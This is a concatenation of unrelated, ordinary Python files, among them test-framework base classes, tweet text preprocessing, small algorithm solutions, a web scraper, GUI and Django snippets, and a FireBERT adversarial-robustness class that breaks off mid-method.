    assert not err.value.stderr, "nothing on the stderr"
    stdout_lines = err.value.output.decode("utf-8").strip().split("\n")
    assert len(stdout_lines) == 2
    log_output, trace_output = stdout_lines
    out_log_message = AirbyteMessage.parse_obj(json.loads(log_output))
    assert out_log_message == expected_log_message, "Log message should be emitted in expected form"
    out_trace_message = AirbyteMessage.parse_obj(json.loads(trace_output))
    # emitted_at is wall-clock time; pin it before the structural comparison.
    assert out_trace_message.trace.emitted_at > 0
    out_trace_message.trace.emitted_at = 0.0  # set a specific emitted_at value for testing
    assert out_trace_message == expected_trace_message, "Trace message should be emitted in expected form"
|
import functools
import os
import time
from testtools import content, content_type
import fixtures
import testresources
import testtools
from common.contrail_test_init import ContrailTestInit
from common import log_orig as contrail_logging
#from common import config
import logging as std_logging
from tcutils.util import get_unique_random_name
# License: Apache-2.0
# Copyright 2012 OpenStack Foundation
# https://github.com/openstack/tempest/blob/master/tempest/test.py
def attr(*args, **kwargs):
    """A decorator which applies the testtools attr decorator
    This decorator applies the testtools.testcase.attr if it is in the list of
    attributes to testtools we want to apply.
    """
    def decorator(f):
        type_arg = kwargs.get('type')
        if isinstance(type_arg, str):
            f = testtools.testcase.attr(type_arg)(f)
        elif isinstance(type_arg, list):
            for tag in type_arg:
                f = testtools.testcase.attr(tag)(f)
        return f
    return decorator
#LOG = logging.getLogger(__name__)
# Quiet down chatty third-party libraries so test logs stay readable.
std_logging.getLogger('urllib3.connectionpool').setLevel(std_logging.WARN)
std_logging.getLogger('paramiko.transport').setLevel(std_logging.WARN)
std_logging.getLogger('keystoneclient.session').setLevel(std_logging.WARN)
std_logging.getLogger('keystoneclient.httpclient').setLevel(std_logging.WARN)
std_logging.getLogger('neutronclient.client').setLevel(std_logging.WARN)
#
#CONF = config.CONF
class TagsHack(object):
    """Mixin that renames test cases not matching the TAGS env var.

    If TAGS is set and none of its (space-separated) tags appear in the
    test method's testtools attributes, the test id is replaced by a
    unique random name so testtools sees distinct case names.
    """
    def id(self):
        original_id = super(TagsHack, self).id()
        requested = os.getenv('TAGS', '')
        if not requested:
            return original_id
        test_method = self._get_test_method()
        attributes = getattr(test_method, '__testtools_attrs', None)
        if attributes:
            for tag in requested.split(" "):
                if tag in attributes:
                    return original_id
        # No requested tag matched: hand back a unique placeholder name.
        return get_unique_random_name()
class BaseTestCase(TagsHack,
                   testtools.testcase.WithAttributes,
                   testtools.TestCase,
                   testresources.ResourcedTestCase):
    """Base test case wiring contrail config/logging into testtools.

    Combines the TAGS-filter hack, testtools attributes, and
    testresources resource management; setUp applies env-var-driven
    timeout and output-capture fixtures (tempest-derived).
    """
    # Flipped by setUpClass; setUp() enforces that subclasses chained up.
    setUpClassCalled = False
    @classmethod
    def setUpClass(cls):
        if hasattr(super(BaseTestCase, cls), 'setUpClass'):
            super(BaseTestCase, cls).setUpClass()
        cls.setUpClassCalled = True
        # Config file: TEST_CONFIG_FILE env var wins, else default ini.
        if 'TEST_CONFIG_FILE' in os.environ :
            cls.ini_file= os.environ.get('TEST_CONFIG_FILE')
        else:
            cls.ini_file= 'sanity_params.ini'
        cls.logger = contrail_logging.getLogger(cls.__name__)
        cls.inputs = ContrailTestInit(cls.ini_file,logger = cls.logger)
    @classmethod
    def tearDownClass(cls):
        # License: Apache-2.0
        # Copyright 2012 OpenStack Foundation
        # https://github.com/openstack/tempest/blob/master/tempest/test.py
        #cls.logger.cleanUp()
        if hasattr(super(BaseTestCase, cls), 'tearDownClass'):
            super(BaseTestCase, cls).tearDownClass()
    # License: Apache-2.0
    # Copyright 2012 OpenStack Foundation
    # https://github.com/openstack/tempest/blob/master/tempest/test.py
    def setUp(self):
        """Apply per-test timeout and stdout/stderr/log capture, driven by
        OS_TEST_TIMEOUT, OS_STDOUT_CAPTURE, OS_STDERR_CAPTURE, OS_LOG_CAPTURE."""
        super(BaseTestCase, self).setUp()
        if not self.setUpClassCalled:
            raise RuntimeError("setUpClass did not call the super's"
                               " setUpClass in the "
                               + self.__class__.__name__)
        # Non-numeric / unset timeout means "no timeout".
        test_timeout = os.environ.get('OS_TEST_TIMEOUT', 0)
        try:
            test_timeout = int(test_timeout)
        except ValueError:
            test_timeout = 0
        if test_timeout > 0:
            self.useFixture(fixtures.Timeout(test_timeout, gentle=True))
        if (os.environ.get('OS_STDOUT_CAPTURE') == 'True' or
                os.environ.get('OS_STDOUT_CAPTURE') == '1'):
            stdout = self.useFixture(fixtures.StringStream('stdout')).stream
            self.useFixture(fixtures.MonkeyPatch('sys.stdout', stdout))
        if (os.environ.get('OS_STDERR_CAPTURE') == 'True' or
                os.environ.get('OS_STDERR_CAPTURE') == '1'):
            stderr = self.useFixture(fixtures.StringStream('stderr')).stream
            self.useFixture(fixtures.MonkeyPatch('sys.stderr', stderr))
        # Log capture is ON unless explicitly disabled.
        # NOTE(review): fixtures.LoggerFixture is a deprecated alias of
        # FakeLogger in newer `fixtures` releases — confirm pinned version.
        if (os.environ.get('OS_LOG_CAPTURE') != 'False' and
                os.environ.get('OS_LOG_CAPTURE') != '0'):
            log_format = '%(asctime)-15s %(message)s'
            self.useFixture(fixtures.LoggerFixture(nuke_handlers=False,
                                                   format=log_format))
        # import pdb;pdb.set_trace()
        # logger = self.useFixture(log.Contrail_Logger(cls.__name__))
    #
    def cleanUp(self):
        super(BaseTestCase, self).cleanUp()
    def addDetail(self, logfile, text):
        """Attach text (plain str or a testtools content object) to results."""
        if type(text) is str:
            super(BaseTestCase, self).addDetail(logfile,
                                                content.text_content(text))
        else:
            super(BaseTestCase, self).addDetail(logfile, text)
    def is_test_applicable(self):
        """Hook for subclasses to skip tests; (True, None) means applicable."""
        return (True, None)
# License: Apache-2.0
# Copyright 2012 OpenStack Foundation
# https://github.com/openstack/tempest/blob/master/tempest/test.py
def call_until_true(func, duration, sleep_for):
    """
    Call the given function until it returns True (and return True) or
    until the specified duration (in seconds) elapses (and return
    False).
    :param func: A zero argument callable that returns True on success.
    :param duration: The number of seconds for which to attempt a
                     successful call of the function.
    :param sleep_for: The number of seconds to sleep after an unsuccessful
                      invocation of the function.
    """
    deadline = time.time() + duration
    while time.time() < deadline:
        if func():
            return True
        # Fix: the original referenced `LOG`, whose definition is commented
        # out at module level — that path raised NameError instead of logging.
        std_logging.getLogger(__name__).debug("Sleeping for %d seconds", sleep_for)
        time.sleep(sleep_for)
    return False
|
import pandas as pd
from sklearn.utils import shuffle
from nltk.corpus import stopwords
from nltk import punkt
import numpy as np
import re, random
from nltk.chunk import RegexpParser
import nltk, scipy, emoji
from nltk.corpus import wordnet
import csv, sys, random, math, re, itertools
from nltk.tokenize import TweetTokenizer
from nltk import word_tokenize
tknzr = TweetTokenizer()
# Contraction -> expansion map used by preprocess_1 after tokenization.
# Keys with a leading space are whole-word variants matched mid-sentence
# without an apostrophe; their values keep the leading space on purpose.
# Fix: "you'll've" previously expanded to " you will have" with a stray
# leading space, unlike every other apostrophe-keyed entry.
CONTRACTIONS = {
    " aint": " am not",
    "ain't": "am not",
    "aren't": "are not",
    " arent": " are not",
    "can't": "cannot",
    " cant": " cannot",
    "can't've": "cannot have",
    " cant've": " cannot have",
    "'cause": "because",
    "could've": "could have",
    "couldn't": "could not",
    " couldnt": " could not",
    "couldn't've": "could not have",
    "didn't": "did not",
    " didnt": " did not",
    "doesn't": "does not",
    " doesnt": " does not",
    "don't": "do not",
    " dont": " do not",
    "hadn't": "had not",
    " hadnt": " had not",
    "hadn't've": "had not have",
    "hasn't": "has not",
    "haven't": "have not",
    "he'd": "he would",
    "he'd've": "he would have",
    "he'll": "he will",
    "he'll've": "he will have",
    "he's": "he is",
    "how'd": "how did",
    "how'd'y": "how do you",
    "how'll": "how will",
    "how's": "how is",
    "I'd": "I would",
    "I'd've": "I would have",
    "I'll": "I will",
    "I'll've": "I will have",
    "I'm": "I am",
    "I've": "I have",
    "isn't": "is not",
    "isnt": "is not",
    "it'd": "it would",
    "it'd've": "it would have",
    "it'll": "it will",
    "it'll've": "it will have",
    "it's": "it is",
    "let's": "let us",
    "ma'am": "madam",
    "mayn't": "may not",
    "might've": "might have",
    "mightn't": "might not",
    "mightn't've": "might not have",
    "must've": "must have",
    "mustn't": "must not",
    "mustn't've": "must not have",
    "needn't": "need not",
    "needn't've": "need not have",
    "o'clock": "of the clock",
    "oughtn't": "ought not",
    "oughtn't've": "ought not have",
    "shan't": "shall not",
    "sha'n't": "shall not",
    "shan't've": "shall not have",
    "she'd": "she would",
    "she'd've": "she would have",
    "she'll": "she will",
    "she'll've": "she will have",
    "she's": "she is",
    "should've": "should have",
    "shouldn't": "should not",
    "shouldn't've": "should not have",
    "so've": "so have",
    "so's": "so is",
    "that'd": "that had",
    "that'd've": "that would have",
    "that's": "that is",
    "there'd": "there would",
    "there'd've": "there would have",
    "there's": "there is",
    "they'd": "they would",
    "they'd've": "they would have",
    "they'll": "they will",
    "they'll've": "they will have",
    "they're": "they are",
    "they've": "they have",
    "to've": "to have",
    "wasn't": "was not",
    "we'd": "we would",
    "we'd've": "we would have",
    "we'll": "we will",
    "we'll've": "we will have",
    "we're": "we are",
    "we've": "we have",
    "weren't": "were not",
    "what'll": "what will",
    "what'll've": "what will have",
    "what're": "what are",
    "what's": "what is",
    "what've": "what have",
    "when's": "when is",
    "when've": "when have",
    "where'd": "where did",
    "where's": "where is",
    "where've": "where have",
    "who'll": "who will",
    "who'll've": "who will have",
    "who's": "who is",
    "who've": "who have",
    "why's": "why is",
    "why've": "why have",
    "will've": "will have",
    "won't": "will not",
    "won't've": "will not have",
    "would've": "would have",
    "wouldn't": "would not",
    "wouldn't've": "would not have",
    "y'all": "you all",
    "y'all'd": "you all would",
    "y'all'd've": "you all would have",
    "y'all're": "you all are",
    "y'all've": "you all have",
    "you'd": "you would",
    "you'd've": "you would have",
    "you'll": "you will",
    "you'll've": "you will have",
    "you're": "you are",
    "you've": "you have"
}
def remove_adjacent_duplicates(word_list):
    """Collapse runs of consecutive equal items to a single item.

    e.g. ['so', 'so', 'good', 'so'] -> ['so', 'good', 'so']

    Fix: the original used None as a "no previous item" sentinel, so a
    list containing literal adjacent None values was not deduplicated.
    itertools.groupby (imported at module level) has no such sentinel.
    """
    return [item for item, _run in itertools.groupby(word_list)]
def remove_adjacent_duplicates_fromline(line):
    """Tokenize a line with TweetTokenizer and collapse adjacent duplicate
    tokens, returning the result as a space-joined string."""
    tokens = TweetTokenizer().tokenize(line)
    deduped = remove_adjacent_duplicates(tokens)
    return ' '.join(deduped)
def preprocess_1(sentence):
    """Normalize one raw text string for downstream tokenization.

    Pipeline: drop non-ASCII, replace URLs with <URL>, demojize emoji,
    collapse repeated punctuation, squash 3+ repeated characters to 2,
    expand contractions, strip leftover symbols, collapse whitespace,
    then remove adjacent duplicate tokens. Returns "" for non-str input.
    """
    if type(sentence) != str:
        return ""
    sentence = (sentence.encode('ascii', 'ignore')).decode("utf-8")
    # URLs
    sentence = re.sub(r'http\S+', ' <URL> ', sentence)
    # emoji
    # NOTE(review): emoji.UNICODE_EMOJI was removed in emoji>=2.0 — confirm
    # the pinned emoji version. Also re.sub() treats c as a regex pattern;
    # assumes emoji characters contain no regex metacharacters.
    for c in sentence:
        if c in emoji.UNICODE_EMOJI:
            sentence = re.sub(c, emoji.demojize(c), sentence)
    # collapse runs of punctuation to a single spaced symbol
    sentence = re.sub("([!]){1,}", " ! ", sentence)
    sentence = re.sub("([.]){1,}", " . ", sentence)
    sentence = re.sub("([?]){1,}", " ? ", sentence)
    sentence = re.sub("([;]){1,}", " ; ", sentence)
    sentence = re.sub("([:]){2,}", " : ", sentence)
    # numerical values
    #sentence = re.sub("[-+]?[.\d]*[\d]+[:,.\d]*", " <NUMBER> ", sentence)
    # convert words such as "goood" to "good"
    sentence = ''.join(''.join(s)[:2] for _, s in itertools.groupby(sentence))
    # symbols
    sentence = re.sub('&', " and ", sentence)
    # tokenize (module-level TweetTokenizer instance)
    words = tknzr.tokenize(sentence)
    # expand contractions
    words = [CONTRACTIONS[word] if word in CONTRACTIONS else word for word in words]
    sentence = " ".join(words)
    # keep only a conservative character set, then collapse whitespace
    sentence = re.sub('[^ a-zA-Z0-9.!?:;<>_#@]', ' ', sentence)
    sentence = re.sub('\s+', ' ', sentence)
    return remove_adjacent_duplicates_fromline(sentence)
from schema import And, Schema, Use
from box import Box
import json
def tolerant_schema(s):
    """Build a Schema for `s` that ignores keys not present in the schema."""
    return Schema(s, ignore_extra_keys=True)
def not_empty(x):
    """Truthiness predicate (used as a schema validator)."""
    return True if x else False
# Reusable schema fragments: JSON-encoded strings decoded to bool/int,
# and a string that must be non-empty.
encoded_bool = And(str, Use(json.loads), bool)
encoded_int = And(str, Use(json.loads), int)
non_empty_string = And(str, not_empty)
def box(properties, *, schema):
    """Validate `properties` against `schema` and wrap the result in a Box
    (snake_case attribute access; missing attributes resolve to None)."""
    return Box(schema.validate(properties), camel_killer_box=True, default_box=True, default_box_attr=None)
|
'''implementation of radix sort for integers'''
def radixSort(arr, radix=10):
    """LSD radix sort for non-negative integers; sorts `arr` in place and
    returns it.

    Fix: digit extraction used `/`, which is float division on Python 3
    (and for this file's Python 2 origin only worked by accident of int
    division); `//` is correct on both.
    """
    shift = 1
    buckets = [[] for _ in range(radix)]
    done = False
    while not done:
        done = True
        for x in arr:
            # current digit of x in base `radix`
            val = (x // shift) % radix
            buckets[val].append(x)
            if val > 0:
                done = False
        # gather buckets back into arr, preserving stable order
        index = 0
        for i, bucket in enumerate(buckets):
            for x in bucket:
                arr[index] = x
                index += 1
            buckets[i] = []
        shift *= radix
    return arr
def test_radixSort():
    """Smoke test: radixSort output matches sorted() on random input.

    Fix: replaced the Python-2-only `print` statement with the function-call
    form, which is valid in both Python 2 and 3.
    """
    from random import randint
    inp = [randint(0, 100) for _ in range(20)]
    sinp = sorted(inp)
    assert sinp == radixSort(inp)
    print('Test passed')
# Run the self-test when executed as a script.
if __name__ == '__main__':
    test_radixSort()
|
# -*- coding: utf-8 -*-
# @Author: WuLC
# @Date: 2016-05-09 16:12:04
# @Last modified by: WuLC
# @Last Modified time: 2016-05-09 16:13:03
# @Email: liangchaowu5@gmail.com
# DP
class Solution(object):
    def uniquePathsWithObstacles(self, obstacleGrid):
        """Count monotone (right/down) lattice paths avoiding obstacles.

        :type obstacleGrid: List[List[int]] (1 marks an obstacle)
        :rtype: int

        Fix: replaced Python-2-only `xrange` with `range` (equivalent here,
        valid on both 2 and 3) and replaced the rb/cb first-row/column
        bookkeeping with the standard, equivalent DP recurrence.
        """
        m = len(obstacleGrid)
        n = len(obstacleGrid[0])
        dp = [[0] * n for _ in range(m)]
        for i in range(m):
            for j in range(n):
                if obstacleGrid[i][j] == 1:
                    continue  # blocked cell contributes 0 paths
                if i == 0 and j == 0:
                    dp[i][j] = 1  # start cell (reachable iff not blocked)
                else:
                    paths_from_above = dp[i - 1][j] if i > 0 else 0
                    paths_from_left = dp[i][j - 1] if j > 0 else 0
                    dp[i][j] = paths_from_above + paths_from_left
        return dp[m - 1][n - 1]
|
class TokenSplitter:
    """Greedy longest-prefix splitter for merged (space-less) tokens.

    `dict` parameters map token length -> list of known tokens of that
    length (parameter name kept for caller compatibility, though it
    shadows the builtin).
    """
    def __init__(self):
        pass

    def get_min_length(self, sentence, dict):
        """Return the longest candidate prefix length: min(len(sentence),
        longest known token length)."""
        minimum_len = 0
        if len(sentence) > max(dict.keys()):
            minimum_len = max(dict.keys())
        else:
            minimum_len = len(sentence)
        return minimum_len

    def token_analyser(self, sentence, dict, en_fa):
        """Greedily split `sentence` into known tokens, longest prefix first.

        Returns the tokens joined by single spaces (with a trailing space),
        or "Error" (en_fa falsy) / the Farsi equivalent (en_fa truthy) when
        no known token matches the current position.

        Fix: the original consumed a matched prefix with
        `sentence.replace(prefix, '')`, which removes ALL occurrences of the
        prefix, silently deleting later matches (e.g. "abcab" lost its
        second "ab"). Slicing removes only the matched prefix.
        """
        minimum_len = self.get_min_length(sentence, dict)
        new_tokens = ""
        while sentence:
            if sentence[:minimum_len] in dict.get(minimum_len, ''):
                new_tokens += sentence[:minimum_len] + " "
                sentence = sentence[minimum_len:]
                minimum_len = self.get_min_length(sentence, dict)
            else:
                minimum_len -= 1
                if minimum_len == 0:
                    if not en_fa:
                        new_tokens = "Error"
                    else:
                        new_tokens = "خطا"
                    break
        return new_tokens

    def splite_english(self):
        """Split mergedTokens.en lines using the en.tokens.en vocabulary and
        write results to output/english_splited_token.txt."""
        token_array = []
        merged_token_array = []
        english_dict = dict()
        with open("en.tokens.en", "r", encoding="utf8") as en_tokens:
            token_array = en_tokens.read().splitlines()
        with open("mergedTokens.en", "r", encoding="utf8") as en_merged_tokens:
            merged_token_array = en_merged_tokens.read().splitlines()
        # index vocabulary by token length
        for splited_word in token_array:
            if len(splited_word) in english_dict:
                english_dict[len(splited_word)].append(splited_word)
            else:
                english_dict[len(splited_word)] = [splited_word]
        with open('output/english_splited_token.txt', 'w+') as english_output:
            for sentence in merged_token_array:
                english_output.write("{} : {} \n".format(sentence, self.token_analyser(sentence, english_dict, 0)))

    def splite_farsi(self):
        """Split mergedTokens.fa lines using the fa.words.txt vocabulary and
        write results to output/farsi_splited_token.txt."""
        merged_token_array = []
        farsi_dict = dict()
        with open("fa.words.txt", "r", encoding="utf8") as fa_tokens:
            for line in fa_tokens:
                # first tab-separated column is the word itself
                w = line.strip('\n').split('\t')[0]
                if len(w) in farsi_dict:
                    farsi_dict[len(w)].append(w)
                else:
                    farsi_dict[len(w)] = [w]
        with open("mergedTokens.fa", "r", encoding="utf8") as fa_merged_tokens:
            merged_token_array = fa_merged_tokens.read().splitlines()
        with open('output/farsi_splited_token.txt', 'w+', encoding="utf8") as farsi_output:
            for sentence in merged_token_array:
                farsi_output.write("{} : {} \n".format(sentence, self.token_analyser(sentence, farsi_dict, 1)))
# Script entry point: run both splitters against their input files.
if __name__ == "__main__":
    sp = TokenSplitter()
    sp.splite_english()
    sp.splite_farsi()
|
# Demo of colorama colored terminal output, then echo user input with an
# alarm when the input is empty.
from colorama import Fore, Back, Style, init

init()
print(Fore.RED + 'some red text')
print(Back.GREEN + 'and with a green background')
print(Style.DIM + 'and in dim text')
print(Style.RESET_ALL)
print('back to normal now')
example = input()
# Fix: compare to None with `is`, not `==` (PEP 8). Note input() never
# actually returns None, so only the empty-string branch can fire.
if example is None or example == '':
    print(Fore.CYAN + 'ALARM!!!!!!!!!!!!!')
    print('1')
print(example)
#!/usr/bin/env python
import requests
from bs4 import BeautifulSoup
import cPickle as pickle
from time import sleep
def main():
    """Fetch per-state craft-brewery counts and write them to states.txt.

    Loads state metadata from pop.pkl (a dict keyed by state abbreviation,
    with 'name' and 'population' entries), queries the Brewers Association
    per-state page for each, and throttles between requests.
    """
    with open("pop.pkl", 'rb') as f:
        states = pickle.load(f)
    url = "http://www.brewersassociation.org/statistics/by-state/"
    with open('states.txt', 'w') as f:
        for state in states:
            payload = {'state': state}
            request = requests.get(url, params=payload)
            states[state]['craft_breweries'] = get_brewery_count(request.text)
            print(states[state])
            # CSV-style line: name,abbr,population,brewery count
            f.write("{name},{abbr},{pop},{breweries}\n"
                    .format(name=states[state]['name'], abbr=state,
                            pop=states[state]['population'],
                            breweries=states[state]['craft_breweries']))
            # be polite to the server between requests
            sleep(5)
def get_brewery_count(state):
    """Extract the craft-brewery count from a state page's HTML.

    :param state: HTML text of the per-state statistics page.
    :return: the count as int, or 0 when the expected markup is missing.

    Fix: `total.getText()` was outside the try block, so a page with a
    "total" div but no "count" span raised an uncaught AttributeError
    (total is None) instead of returning 0.
    """
    try:
        page = BeautifulSoup(state)
        total_div = page.find("div", class_="total")
        total = total_div.find("span", class_="count")
        return int(total.getText())
    except AttributeError:
        return 0
# Script entry point.
if __name__ == '__main__':
    main()
|
from tkinter import *
import wikipedia
def get_me():
    """Fetch a Wikipedia summary for the query in `entry` and display it in
    the `answer` text widget, replacing any previous content."""
    entry_value = entry.get()
    answer.delete(1.0, END)
    try:
        answer_value = wikipedia.summary(entry_value)
        answer.insert(INSERT, answer_value)
    except Exception:
        # Fix: was a bare `except:`, which also swallowed KeyboardInterrupt
        # and SystemExit. wikipedia raises several error types
        # (DisambiguationError, PageError, network errors), so a broad
        # Exception handler with a generic hint is intentional here.
        answer.insert(INSERT, "check input OR internet connection")
# Build the GUI: a top frame with the query entry + Search button, and a
# bottom frame with a scrollable text area for the summary.
root = Tk()
root.title("Search")
top_frame = Frame(root)
bottom_frame = Frame(root)
#top_frame
entry = Entry(top_frame,width=30)
entry.pack()
button = Button(top_frame,text="Search",bg="grey",fg="black",command=get_me)
button.pack(side=RIGHT)
#bottom_frame
scroll = Scrollbar(bottom_frame)
scroll.pack(side =RIGHT,fill=Y)
answer = Text(bottom_frame,width=30,height=10, yscrollcommand = scroll.set,wrap=WORD)
scroll.config(command=answer.yview)
answer.pack()
top_frame.pack(side =TOP)
bottom_frame.pack(side=BOTTOM)
# overrides the earlier "Search" title
root.title("WikiPedia")
root.mainloop()
|
"""Post forms."""
from django import forms
from posts.models import Post
class PostForm(forms.ModelForm):
    """Post model forms."""
    class Meta:
        """Form configuration: backing model, exposed fields, widgets."""
        model = Post
        fields = ('user', 'profile', 'title', 'photo')
        widgets = {
            # Bootstrap-styled input for the title field
            'title': forms.TextInput(attrs={
                'class': 'form-control',
                'placeholder': 'Title',
            }),
        }
|
import sys
# Redirect stdin to a local test-input file so input() reads from it.
sys.stdin = open('동철이의일분배.txt','r')
def combo(deep, sofar):
    """Recursively assign task `deep` to an unused worker, maximizing the
    product of success probabilities; the best product found is kept in
    the global max_poten.

    deep: index of the next task to assign (0..N-1)
    sofar: product of the probabilities chosen so far (in [0, 1])
    """
    # NOTE(review): `poten` is declared global but never used in this file.
    global poten,N, max_poten
    # prune: probabilities are <= 1, so sofar can only shrink from here
    if sofar <= max_poten:
        return
    if deep==N:
        if sofar > max_poten:
            max_poten = sofar
        return
    for task in range(N):
        if visited[task] ==0:
            visited[task] =True
            combo(deep+1, sofar*data[deep][task])
            visited[task] = 0
# Read T test cases; each gives N and an N x N percentage matrix
# data[task][worker]. Report the best assignment's product as a percentage.
T = int(input())
for time in range(T):
    N = int(input())
    max_poten = 0
    visited = [0]*N
    data=[]
    for infos in range(N):
        # convert integer percentages to probabilities
        info = [ele*0.01 for ele in list(map(int,input().split()))]
        data.append(info)
    combo(0,1)
    # back to a percentage for output
    max_poten = max_poten*100
    print('#',time+1," ", "%0.6f" % max_poten, sep='')
|
#day2
#part2
def have_one_diff(b1, b2):
    """Return True iff b1 and b2 differ at exactly one position.

    Assumes equal-length box IDs (as in the puzzle input).
    Fix: the original implicitly returned None for identical strings;
    this returns an explicit bool (still falsy for callers).
    """
    num_diff = 0
    for i in range(len(b1)):
        if b1[i] != b2[i]:
            num_diff += 1
            if num_diff > 1:
                return False  # early exit: more than one difference
    return num_diff == 1
def find_almost_match(box):
    """Return the first pair of box IDs that differ at exactly one position,
    or None when no such pair exists."""
    for i, first in enumerate(box):
        for second in box[i + 1:]:
            if have_one_diff(first, second):
                return (first, second)
def print_similarities(match):
    """Print the characters the matched pair share, position by position."""
    first, second = match
    shared = ""
    for c1, c2 in zip(first, second):
        if c1 == c2:
            shared += c1
    print(shared)
# Read the puzzle input: one box ID per line (newlines are kept, which is
# harmless since every line has one).
box_ids = []
f = open("day2_input.txt", "r")
for x in f:
    box_ids.append(x)
#find matches
matches = find_almost_match(box_ids)
#print the matches minus the single difference
print_similarities(matches)
# Retained part-1 solution, intentionally disabled via a string literal.
"""
#part1
def analyze_text(x):
    global num_doubles, num_triples
    d = {}
    for letter in x:
        if letter in d: #letter has already been found
            d[letter] += 1
        else: #first occurance of this letter
            d[letter] = 1
    #search for doubles
    if is_double_in_set(d):
        num_doubles += 1
    #search for triples
    if is_triple_in_set(d):
        num_triples += 1
def is_double_in_set(d):
    for k,v in d.items():
        if v == 2:
            return True
    return False
def is_triple_in_set(d):
    for k,v in d.items():
        if v == 3:
            return True
    return False
num_doubles = 0
num_triples = 0
f = open("day2_input.txt", "r")
for x in f:
    analyze_text(x)
print(num_doubles * num_triples)
"""
|
# coding=utf-8
# Copyright 2020 Gunnar Mein, Kevin Hartman, Andrew Morris. All rights reserved.
#
# Licensed under the MIT license
# See https://github.com/FireBERT-NLP/FireBERT/blob/master/LICENSE for details
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# FVE as a subclass
# overrides extend_batch_examples_test() used in forward()
#
import torch
from torch import nn
import numpy as np
import argparse
from switch import SWITCH
from firebert_base import FireBERT_base
class FireBERT_FVE(FireBERT_base):
    """FVE variant of FireBERT_base.

    Overrides extend_batch_examples_eval() (used by forward()) so each eval
    batch is extended with Gaussian-perturbed copies of the embeddings of a
    sample's most important words, as identified by SWITCH; predictions are
    then made by voting over each group.
    """

    def __init__(self, load_from=None, processor=None, hparams=None):
        super(FireBERT_FVE, self).__init__(load_from=load_from, processor=processor, hparams=hparams)
        # need SWITCH to tell us what the important words are
        self.switch = SWITCH(hparams=hparams, model=self, tokenizer=self.tokenizer, device=self.device)
        # merge passed hparams over default hparams
        hdict = self.get_default_hparams()
        hdict.update(hparams)
        self.hparams = argparse.Namespace(**hdict)
        self.actualize_hparams()
        return

    # methods to set hparams on the fly
    def update_hparams(self, new_hparams):
        """Merge new hyperparameters on the fly (also into SWITCH and base)."""
        hdict = vars(self.hparams)
        hdict.update(new_hparams)
        self.hparams = argparse.Namespace(**hdict)
        self.switch.update_hparams(new_hparams)
        super().update_hparams(new_hparams)
        self.actualize_hparams()

    def actualize_hparams(self):
        """Cache frequently used hparams as plain attributes."""
        self.count = self.hparams.vector_count
        self.perturb_words = self.hparams.perturb_words
        self.std = self.hparams.std
        return

    #
    # here are some useful defaults
    #
    def get_default_hparams(self):
        """Return base defaults overlaid with SWITCH/FVE-specific defaults."""
        d = FireBERT_base.get_default_hparams(self)
        d.update({
            # these are for SWITCH
            'use_USE': False,
            'stop_words': True,
            'perturb_words': 2,
            # this is for base
            'verbose': False,
            'vote_avg_logits': True,
            # this is for us
            'std': 0.05,
            'vector_count': 10
        })
        return d

    # this fills in the hook prepared in the base class
    def extend_batch_examples_eval(self, input_ids=None, attention_mask=None, token_type_ids=None,
                                   position_ids=None, head_mask=None, inputs_embeds=None, example_idx=None):
        """Extend an eval batch with perturbed-embedding copies per example.

        Returns the forward() argument tuple plus group_ids/group_sizes,
        which record which rows belong to the same original example so the
        base class can vote over each group.
        """
        group_ids = None
        group_sizes = []
        inputs_embeds_results = inputs_embeds
        # we do need the examples for SWITCH
        if example_idx is not None:
            # let's get the embeddings for the original samples
            inputs_embeds = self.bert.get_input_embeddings()(input_ids).detach()
            inputs_embeds_results = inputs_embeds
            # in groups, we keep track of samples that belong together for voting
            group_ids = list(range(0, len(example_idx)))
            group_sizes = []
            current_group = 0
            # gotta go through one by one. SWITCH is a one-by-one thing, anyway.
            for i, idx in enumerate(example_idx):
                example = self.test_examples[idx]
                # call the perturbation method individually for each example
                perturbed_inputs_embeds, sample_attention_mask, sample_token_type_ids, _, _, _ = \
                    self.perturb_example(example,
                                         sample_index=i,
                                         input_ids=input_ids,
                                         attention_mask=attention_mask,
                                         token_type_ids=token_type_ids)
                if perturbed_inputs_embeds is None:
                    # didn't get any important words to perturb, so no batch extensions
                    group_sizes.append(1)  # just the original
                else:
                    inputs_embeds_results = torch.cat((inputs_embeds_results, perturbed_inputs_embeds), dim=0)
                    attention_mask = torch.cat((attention_mask, sample_attention_mask), dim=0)
                    token_type_ids = torch.cat((token_type_ids, sample_token_type_ids), dim=0)
                    group_ids += [current_group] * (self.count)
                    group_sizes.append(self.count + 1)  # plus one for the original
                    current_group += 1
            # need to erase the tokens (input_ids) so that BERT will use the embeddings
            input_ids = None
            # we probably received these as None, but if we don't set them to that, we might have to
            # adjust them for the new batch size and that would be tedious
            head_mask = None
            position_ids = None
            # won't need these anymore
            example_idx = None
        return input_ids, attention_mask, token_type_ids, position_ids, head_mask, inputs_embeds_results, example_idx, group_ids, group_sizes

    #
    # this perturbs an example and returns it in a batch with others
    #
    def perturb_example(self, example, count=None, std=None, sample_index=0, input_ids=None, attention_mask=None, token_type_ids=None):
        """Build a batch of `count` copies of one example whose most
        important word embedding is Gaussian-perturbed with stddev `std`.

        Returns (batch, attention_mask, token_type_ids, points,
        important_words, None); batch is None when SWITCH finds no
        important words.
        """
        if count is None:
            count = self.count
        if std is None:
            std = self.std
        if input_ids is None:
            # convert example into features
            input_ids, attention_mask, token_type_ids, _ = self.processor.create_feature_tensors([example], device=self.device)
            sample_index = 0
        # use SWITCH to figure out word importance within the list
        word_indices, token_indices, word_list = \
            self.switch.get_important_indices_from_example(example,
                                                           input_ids[sample_index].unsqueeze(0),
                                                           token_type_ids[sample_index].unsqueeze(0),
                                                           attention_mask[sample_index].unsqueeze(0))
        # filter out useless stuff
        word_indices = list(filter(lambda x: x != -1, word_indices))
        token_indices = list(filter(lambda x: x != -1, token_indices))
        # identify most important words
        important_words = [word_list[i] for i in word_indices[:self.perturb_words]]
        token_indices = token_indices[:self.perturb_words]
        # get embeddings from BERT for the whole sample (set of words)
        embeddings = self.bert.get_input_embeddings()(input_ids[sample_index]).detach()
        batch = None
        points = None
        # NOTE(review): each iteration rebuilds `batch` from the unperturbed
        # embeddings, so only the LAST selected token index ends up perturbed
        # in the returned batch — confirm whether all selected words should
        # be perturbed simultaneously.
        for token_index in token_indices:
            # get the embedding vector for the most important word
            v = embeddings[token_index].clone().detach()
            # scale the single sample set of tokens/embeddings up to a whole batch
            batch = embeddings.repeat(count, 1, 1)
            # scatter a region around this vector
